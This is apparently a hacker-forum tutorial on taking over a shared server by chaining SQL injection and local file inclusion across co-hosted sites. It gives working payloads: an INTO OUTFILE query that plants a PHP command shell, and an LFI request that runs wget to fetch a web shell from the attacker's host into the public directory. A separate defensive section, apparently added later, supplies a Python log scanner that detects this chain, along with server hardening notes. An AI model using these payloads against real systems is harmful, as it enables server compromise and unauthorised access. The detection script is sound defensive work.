Okay so I'm about to explain a very nifty and important way to own a server that you're targeting. This is something most young hackers never think of doing, but it can be very handy when a server is hosting multiple sites. Let's say you target a server and do a reverse IP lookup to see how many sites are hosted on it. The more sites, the better your chances of getting into the server. So the server ends up having 5 sites on it. After looking around for vulnerabilities on all 5 sites, you find 1 site is vuln to SQLi and another is vuln to LFI.
[0x02] The Attack:
Okay so of course most hackers will take the SQLi to gain the admin credentials and try to log in, because it's sometimes faster than LFI if /proc/self/environ isn't present on the LFI vulnerable site. So we do everything right, but when we try to log in, the credentials that we extracted from the DB are outdated and misleading. So now what? Give up? NOOOOOO!
[0x03] Attack 1:
So if we have the right privileges in the SQLi with our current user, we could possibly write files to the server through the SQLi. So we are going to add a file to a writable directory; usually the "temp" directory is writable, so we are going to write a one-line shell that will let us run commands on the server. Just like a PHP shell but smaller, and used through the URL with no interface.
http://www.sqlivuln.com/index.php?ID=-1 union select '<?system($_GET[cmd])?>',2,3,4,5 into outfile "/tmp/cmd.txt"--
* Here we just use INTO OUTFILE to write cmd.txt, which is our shell, to the tmp directory, which is writable. Just your normal SQLi: 5 columns, the 1st column is used to retrieve data just like you would when getting your version(), and you add into outfile "/tmp/cmd.txt" to the end of your syntax. Now our shell is created, and we use the $cmd variable to $_GET our commands. Will explain in the next attack.
[0x04] Attack 2:
Now that we have our file on the server, let's go back to our LFI vuln site on the same server, read cmd.txt, try to execute a command, and hopefully get a shell up. This step is easy.
[*] Typical LFI Vuln:
[*] Reading CMD.txt by leveraging LFI vuln:
[*] Running command on CMD.txt by leveraging LFI vuln:
http://www.lfivuln.com/index.php?file=../tmp/cmd.txt&cmd=wget http://email@example.com/myshell.txt -O /full-path-of-site/public_html/shell.php
(This will execute the $cmd variable in cmd.txt to run the wget command, which will download a text file from my server; that file is just a PHP shell with the .txt extension, and the -O /full-path-of-site/public_html/shell.php option will rename the file to shell.php. Of course you must find the full path of the server so that you can download your shell to a directory that we can open our shell up through via the browser, the "hosting directory" in short terms.)
[*] Opening shell.
(I uploaded the shell using the LFI vuln site, so the shell clearly is going to be hosted in the root directory or "hosting directory" of the LFI vuln site where I saved it.)
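From the defender's side, the thing worth catching in this chain (Attack 1 writing a file through SQLi with INTO OUTFILE, Attack 2 pulling that same file in through LFI on a neighbouring vhost) is the correlation across sites on one box, since each request on its own looks like a routine SQLi or LFI probe. The script below is an added example, not code from this thread; it scans a constructed access log in a simplified "vhost ip [ts] "request" status" format (assumed, not a real server's default), flags UNION SELECT ... INTO OUTFILE and traversal in parameter values after percent-decoding, and raises a cross_site_pivot finding when the outfile path written on one vhost is later included on another. Host names and addresses are made up.

```python
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (not from the thread). Simplified format:
#   vhost client-ip [timestamp] "request-line" status
# Two virtual hosts on one box: one request writes a file through SQLi on
# sqlivuln.example, a later request on lfivuln.example includes that file.
SAMPLE_LOG = """\
sqlivuln.example 203.0.113.7 [10/Oct/2023:13:55:01 +0000] "GET /index.php?ID=1 HTTP/1.1" 200
sqlivuln.example 203.0.113.7 [10/Oct/2023:13:55:36 +0000] "GET /index.php?ID=-1%20union%20select%20%27%3C%3Fsystem(%24_GET%5Bcmd%5D)%3F%3E%27,2,3,4,5%20into%20outfile%20%22/tmp/cmd.txt%22-- HTTP/1.1" 200
lfivuln.example 198.51.100.9 [10/Oct/2023:13:56:02 +0000] "GET /index.php?file=about HTTP/1.1" 200
lfivuln.example 203.0.113.7 [10/Oct/2023:13:57:10 +0000] "GET /index.php?file=../tmp/cmd.txt&cmd=id HTTP/1.1" 200
"""

LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})$'
)
# Matched against the percent-decoded query string, so %20 / %27 style
# encoding does not hide the keywords.
UNION_SELECT_RE = re.compile(r'\bunion\b.*?\bselect\b', re.I | re.S)
INTO_OUTFILE_RE = re.compile(r'\binto\s+(?:out|dump)file\s+[\'"]([^\'"]+)[\'"]', re.I)
# A ".." path segment, a null byte, or an absolute path in a parameter value.
# Tune per application: some sites legitimately pass absolute paths.
TRAVERSAL_RE = re.compile(r'(?:^|[/\\])\.\.(?:[/\\]|$)|\x00|^/')


def canonical_path(value):
    """Collapse traversal so '../tmp/cmd.txt' and '/tmp/cmd.txt' compare equal.

    Anchored at '/' because the include's working directory is not known from
    the log alone; a null byte truncates the path the way old PHP did.
    """
    value = value.split("\x00", 1)[0].replace("\\", "/")
    return posixpath.normpath("/" + value.lstrip("/"))


def parse_line(line):
    """Parse one log line into a dict with decoded query parameters."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes keys and values; keep blanks so "cmd=" survives.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    rec["decoded_query"] = " ".join(f"{k}={v}" for k, v in rec["params"])
    return rec


def classify(rec):
    """Return the findings for one parsed request (no correlation yet)."""
    findings = []
    q = rec["decoded_query"]
    if UNION_SELECT_RE.search(q):
        m = INTO_OUTFILE_RE.search(q)
        if m:
            findings.append({"kind": "sqli_into_outfile", "path": m.group(1)})
        else:
            findings.append({"kind": "sqli_union_select", "query": q[:120]})
    for key, value in rec["params"]:
        if TRAVERSAL_RE.search(value):
            others = [k for k, _ in rec["params"] if k != key]
            findings.append({"kind": "lfi_traversal", "param": key,
                             "value": value, "other_params": others})
    return findings


def analyze(log_text):
    """Scan a log, tag each finding with vhost/ip/ts, and raise a
    cross_site_pivot finding when a file written via SQLi on one vhost is
    later included via LFI on any vhost."""
    findings = []
    written = {}  # canonical path -> the sqli_into_outfile finding that wrote it
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for f in classify(rec):
            f.update(vhost=rec["vhost"], ip=rec["ip"], ts=rec["ts"])
            findings.append(f)
            if f["kind"] == "sqli_into_outfile":
                written[canonical_path(f["path"])] = f
            elif f["kind"] == "lfi_traversal":
                hit = written.get(canonical_path(f["value"]))
                if hit is not None:
                    findings.append({"kind": "cross_site_pivot",
                                     "writer_vhost": hit["vhost"],
                                     "reader_vhost": f["vhost"],
                                     "path": canonical_path(f["value"]),
                                     "ip": f["ip"], "ts": f["ts"]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

On the sample log this yields three findings: the INTO OUTFILE write on sqlivuln.example, the traversal on lfivuln.example, and the cross_site_pivot tying them together by the canonical path /tmp/cmd.txt. To run it against real logs, swap LOG_RE for your server's format (Apache's `%v` or nginx's `$host` gives you the vhost field) and keep the correlation keyed on the canonical path, since the same file is referenced two different ways in the two requests. The chain also dies on the server side when the database account lacks the FILE privilege or MySQL's `secure_file_priv` restricts where OUTFILE can write, and when PHP's `open_basedir` keeps the include() on each vhost from reaching /tmp.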
Hope you guys enjoyed my thread. Also, I'm not perfect; if I made mistakes or anything in the tutorial, please let me know and I'll edit the thread. Or if you have anything to add to the thread that could better it, please share. Wouldn't mind learning something new.